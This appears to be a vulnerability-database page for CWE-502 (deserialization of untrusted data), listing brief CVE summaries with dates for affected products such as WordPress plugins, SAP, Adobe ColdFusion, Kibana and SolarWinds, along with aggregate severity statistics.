CWE-502: Deserialization of Untrusted Data
The product deserializes untrusted data without sufficiently verifying that the resulting data will be valid.
Yearly Trend
Top Affected Vendors
All Deserialization of Untrusted Data CVEs (998)
The Uncanny Automator WordPress plugin contains a PHP object injection vulnerability that allows unauthenticated attackers to execute arbitrary code t...
May 14, 2025CVE-2025-42999 is a deserialization vulnerability in SAP NetWeaver Visual Composer Metadata Uploader that allows privileged users to upload malicious ...
May 13, 2025This CVE describes a deserialization vulnerability in Adobe ColdFusion that allows attackers to execute arbitrary code without user interaction. Syste...
Apr 8, 2025This CVE describes a fastjson deserialization vulnerability in MSFM that allows remote code execution by sending malicious payloads to the system/tabl...
Jan 15, 2025This vulnerability allows remote code execution through fastjson deserialization in MSFM's table editing component. Attackers can exploit this to exec...
Jan 15, 2025A deserialization vulnerability in Kibana allows authenticated attackers with specific Elasticsearch and Kibana privileges to execute arbitrary code b...
Nov 14, 2024This vulnerability in H2O.ai H2O allows attackers to set arbitrary JDBC URLs, leading to deserialization attacks, file reads, and remote code executio...
Sep 6, 2024The Events Calendar Pro WordPress plugin is vulnerable to PHP object injection through deserialization of untrusted input in the 'filters' parameter. ...
Aug 30, 2024This CVE describes a deserialization vulnerability in Apache InLong that allows attackers to read arbitrary files from the server. The vulnerability a...
Mar 6, 2024This CVE describes a deserialization vulnerability in Dataease's MySQL datasource component that allows attackers to bypass JDBC attack blacklists. Su...
Feb 29, 2024This CVE describes a PHP object injection vulnerability in the HTML5 MP3 Player with Folder Feedburner Playlist Free WordPress plugin. Attackers can e...
Jan 8, 2024This CVE describes a PHP object injection vulnerability in the HTML5 SoundCloud Player with Playlist Free WordPress plugin. Attackers can exploit dese...
Jan 8, 2024This vulnerability allows remote attackers to execute arbitrary code via PHP object injection through deserialization of untrusted data in the HTML5 M...
Jan 8, 2024This vulnerability allows attackers to execute arbitrary PHP code through insecure deserialization in the YITH WooCommerce Product Add-Ons plugin. It ...
Dec 31, 2023CVE-2021-41110 is a critical deserialization vulnerability in cwlviewer that allows remote code execution by parsing malicious YAML data. The vulnerab...
Oct 1, 2021CVE-2021-29508 is a deserialization vulnerability in Wire serialization library that allows attackers to execute arbitrary code by sending malicious p...
May 11, 2021This CVE describes a remote code execution vulnerability in Taiga project management platform due to unsafe deserialization of untrusted data in the A...
Oct 28, 2025This vulnerability allows unauthenticated attackers to execute arbitrary PHP code through deserialization of untrusted data in the Photography WordPre...
Sep 9, 2025This CVE describes a deserialization vulnerability in Sitecore Experience Manager (XM) and Experience Platform (XP) that allows attackers to inject an...
Sep 3, 2025This vulnerability allows authenticated users to execute arbitrary code remotely on affected systems by exploiting a flaw in the client-server communi...
Jul 11, 2025CVE-2025-36038 is a critical deserialization vulnerability in IBM WebSphere Application Server that allows remote attackers to execute arbitrary code ...
Jun 25, 2025CVE-2025-5086 is a deserialization vulnerability in Dassault Systèmes DELMIA Apriso that allows remote attackers to execute arbitrary code by sending...
Jun 2, 2025This vulnerability allows remote attackers to execute arbitrary code via PHP object injection in the Traveler WordPress theme. It affects WordPress si...
Mar 27, 2025CVE-2025-29783 is a remote code execution vulnerability in vLLM when configured with Mooncake for distributed key-value storage. Attackers can exploit...
Mar 19, 2025This vulnerability allows remote code execution on Apache Ignite servers by bypassing class serialization filters. Attackers can craft malicious messa...
Feb 14, 2025SolarWinds Access Rights Manager (ARM) contains a deserialization vulnerability (CWE-502) that allows authenticated users to execute arbitrary code re...
Sep 12, 2024CVE-2024-43252 is a PHP object injection vulnerability in the Crew HRM WordPress plugin that allows attackers to execute arbitrary code through deseri...
Aug 19, 2024This vulnerability allows unauthenticated attackers to perform PHP object injection via the recently_viewed_products cookie in the CoDesigner WooComme...
Jun 13, 2024An unsafe .NET object deserialization vulnerability in DELMIA Apriso allows attackers to execute arbitrary code without authentication. This affects a...
May 30, 2024This vulnerability allows authenticated users of SolarWinds Access Rights Manager to execute arbitrary code remotely on affected systems. Attackers wi...
May 14, 2024CVE-2024-33553 is an unauthenticated PHP object injection vulnerability in the XStore Core WordPress plugin. Attackers can exploit deserialization of ...
Apr 29, 2024CVE-2024-30223 is an unauthenticated PHP object injection vulnerability in the ARMember WordPress plugin. Attackers can exploit this by sending specia...
Mar 28, 2024This CVE describes a PHP object injection vulnerability in the INFINITUM FORM Geo Controller WordPress plugin due to insecure deserialization of untru...
Mar 28, 2024CVE-2023-45146 is a critical remote code execution vulnerability in XXL-RPC when configured with Netty and Hessian serialization. Attackers can send m...
Oct 18, 2023This vulnerability allows authenticated attackers to execute arbitrary code on SolarWinds Orion Platform servers through insecure deserialization. It ...
Sep 1, 2021This vulnerability allows remote code execution through deserialization of untrusted data in the SolarWinds Orion Patch Manager Web Console. An attack...
Sep 1, 2021This vulnerability allows remote authenticated attackers to bypass authentication and execute arbitrary code with SYSTEM privileges on GFI Archiver in...
Feb 20, 2026This vulnerability allows attackers to inject malicious objects through deserialization of untrusted data in the Dotstore Woocommerce Category Banner ...
Feb 20, 2026This CVE describes a PHP object injection vulnerability in the WordPress Slider Responsive Slideshow plugin, allowing attackers to execute arbitrary c...
Feb 20, 2026This CVE describes a PHP object injection vulnerability in the PeakShops WordPress theme caused by unsafe deserialization of user-controlled data. Att...
Feb 20, 2026This CVE describes a PHP object injection vulnerability in the Kleor Contact Manager WordPress plugin. Attackers can exploit insecure deserialization ...
Feb 20, 2026This CVE describes a PHP object injection vulnerability in the ModelTheme Addons for WPBakery and Elementor WordPress plugin. Attackers can exploit in...
Feb 20, 2026This CVE describes a PHP object injection vulnerability in the Valenti WordPress theme caused by unsafe deserialization of untrusted data. Attackers c...
Feb 19, 2026The Advanced AJAX Product Filters WordPress plugin is vulnerable to PHP object injection via deserialization of untrusted input in the Live Composer c...
Feb 18, 2026This vulnerability in Infoblox NIOS allows attackers to execute arbitrary code remotely through insecure deserialization. It affects all Infoblox NIOS...
Feb 12, 2026This vulnerability allows attackers to execute arbitrary code on WordPress sites running the vulnerable WpEvently plugin by exploiting insecure deseri...
Feb 3, 2026This vulnerability allows attackers to execute arbitrary code through PHP object injection by exploiting insecure deserialization in the North WordPre...
Jan 22, 2026This vulnerability allows attackers to inject malicious objects through deserialization of untrusted data in the Dental Care CPT WordPress plugin. Suc...
Jan 22, 2026This vulnerability allows attackers to inject malicious objects through deserialization of untrusted data in the Tech Life CPT WordPress plugin. Succe...
Jan 22, 2026This vulnerability allows remote attackers to execute arbitrary code through PHP object injection in the OneLife WordPress theme. Attackers can exploi...
Jan 22, 2026About Deserialization of Untrusted Data (CWE-502)
The product deserializes untrusted data without sufficiently verifying that the resulting data will be valid.
Our database tracks 998 CVEs classified as CWE-502, with 484 rated critical and 458 rated high severity. The average CVSS score for Deserialization of Untrusted Data vulnerabilities is 8.8.
External reference: View CWE-502 on MITRE CWE →
Monitor Deserialization of Untrusted Data Vulnerabilities
Get alerted when new Deserialization of Untrusted Data CVEs affect your infrastructure.
Start Monitoring Free